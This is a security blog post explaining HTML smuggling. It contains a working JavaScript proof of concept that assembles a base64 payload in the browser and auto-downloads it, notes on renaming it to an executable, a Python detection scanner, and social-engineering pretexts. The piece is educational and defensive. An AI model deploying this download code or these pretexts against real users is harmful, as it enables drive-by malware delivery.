What happens after the click? – Part 2 – HTML Smuggling
- Matei

- Sep 30
Continuing our “What happens after the click?” series (see part 1 at https://www.hivehack.tech/post/what-happens-after-the-click-part-1-fake-captcha), we are back with an article on HTML smuggling. Have you ever visited a link and noticed that a download was triggered straight away? That is most likely HTML smuggling (also known as a drive-by download).
HTML Smuggling
Websites are often used for malware delivery, however, this typically involves the following steps:
1) The victim visits the website
2) The victim clicks “download”
3) The victim executes the malware
Failure of any of these steps results in the failure of the attack. Thus, threat actors are motivated to reduce the complexity of their attacks to increase the chances of success. HTML smuggling is a technique that uses JavaScript together with the HTML5 anchor tag download attribute to assemble the payload inside the browser and trigger its download automatically, so the file never has to be fetched as a separate download from the server. Thus, the second step in the attack described above is skipped altogether.
We used the following proof of concept to trigger the download of test.txt containing “Hello world!”; the code can easily be modified for any type of file. The first string of note, the content of the file variable, is “Hello world!” base64-encoded. An attacker could base64-encode any string (or any binary, for that matter). The second string of note is the fileName. In this case it is test.txt, but it could just as easily be changed to test.exe, for instance, if we were trying to deliver an executable.
<html>
<body>
<script>
// Decode a base64 string into an ArrayBuffer so it can be wrapped in a Blob.
function base64ToArrayBuffer(base64) {
  var binary_string = window.atob(base64);
  var len = binary_string.length;
  var bytes = new Uint8Array(len);
  for (var i = 0; i < len; i++) {
    bytes[i] = binary_string.charCodeAt(i);
  }
  return bytes.buffer;
}

// Payload: "Hello world!" base64-encoded. Any file content can be placed here.
var file = 'SGVsbG8gd29ybGQh';
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
// Name the browser will save the file under.
var fileName = 'test.txt';

// Create a hidden anchor pointing at the in-memory blob, set the download
// attribute, and click it programmatically to trigger the download.
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
</script>
</body>
</html>
Saving the payload with a .html extension and opening it with a browser automatically triggered the download of test.txt.

Exploring the extensions of the files and the behaviour of various browsers is key. In this case, we were using Microsoft Edge and it downloaded test.txt and test.exe straight away, however, test.dll was blocked, and required explicit approval from the user.
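From the defender's side, the combination shown in the proof of concept (base64 decode, Blob construction, object URL and a scripted anchor download) is a usable static signature. The following Python scanner is an added example, not code from the original article: it flags that combination in a page's source, resolves the file name assigned to the download attribute, and decodes any embedded base64 literal so the payload's size, hash and leading bytes can be recorded. MARKERS, analyze_html and SAMPLE_HTML are names of this example's own; SAMPLE_HTML is a constructed copy of the proof of concept above.

```python
import base64
import hashlib
import re

# Markers that together suggest a client-side "smuggled" download: a base64
# decode, Blob construction, an object URL and a scripted anchor download.
MARKERS = ("atob(", "new Blob(", "createObjectURL(", ".download", ".click(")
# Quoted literals in the base64 alphabet; the 16-char minimum skips short
# values such as MIME types ('octet/stream') and plain file names.
B64_LITERAL_RE = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")
# ".download = 'x.exe'" or ".download = someVar"
DOWNLOAD_RE = re.compile(r"""\.download\s*=\s*(?:['"]([^'"]+)['"]|(\w+))""")
# "name = 'literal'" assignments, used to resolve a variable file name
ASSIGN_RE = re.compile(r"""(\w+)\s*=\s*['"]([^'"]*)['"]""")


def analyze_html(html: str) -> dict:
    """Report HTML-smuggling indicators found in a page's source."""
    markers = [m for m in MARKERS if m in html]
    assignments = dict(ASSIGN_RE.findall(html))
    filename = None
    m = DOWNLOAD_RE.search(html)
    if m:
        filename = m.group(1) or assignments.get(m.group(2))
    payloads = []
    for literal in B64_LITERAL_RE.findall(html):
        try:
            raw = base64.b64decode(literal, validate=True)
        except ValueError:  # looked like base64 but is not
            continue
        payloads.append({"size": len(raw),
                         "sha256": hashlib.sha256(raw).hexdigest(),
                         "preview": raw[:16]})  # enough to spot a PE/ZIP header
    return {"suspicious": len(markers) >= 3, "markers": markers,
            "filename": filename, "payloads": payloads}


# Constructed copy of the proof of concept discussed above (not a live sample).
SAMPLE_HTML = """<html><body><script>
var file = 'SGVsbG8gd29ybGQh';
var bytes = Uint8Array.from(window.atob(file), c => c.charCodeAt(0));
var blob = new Blob([bytes], {type: 'octet/stream'});
var fileName = 'test.txt';
var a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download = fileName;
a.click();
</script></body></html>"""

if __name__ == "__main__":
    print(analyze_html(SAMPLE_HTML))
```

The decoded preview and hash are what you would feed to a sandbox or threat-intelligence lookup; a web proxy or mail gateway that only inspects URLs will never see the file, because it is assembled inside the browser.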

Limitations
At the end of the day, this attack by itself only delivers the payload to the victim; the victim must still execute it. But how many items are currently in your Downloads directory? Mine has 208. It is easy to execute something by mistake. In practice, HTML smuggling would not be used by itself; instead, attackers would combine it with social engineering to make the user execute the payload. A potential pretext could be “Your system is infected. Run the following executable to remove the malware”. In this case, however, the downloaded executable will carry the Mark of the Web (MOTW). MOTW is file metadata in Windows that marks a file obtained from an untrusted source. Certain applications apply additional security measures to files from untrusted sources: for instance, Microsoft Office opens such documents in Protected View, and SmartScreen raises a prompt before an executable is launched. So even once files have been downloaded onto the system, pretexting is key.
Conclusion
In this article, we explored the impact of phishing beyond entering credentials in malicious websites impersonating legitimate ones. We looked at an attack vector whereby files are automatically downloaded onto the victim’s device when a link is visited. If you are not yet convinced of the impact of phishing attacks, stay tuned for our next article in this series where we will explore various browser attacks using The Browser Exploitation Framework (BeEF). Stay safe!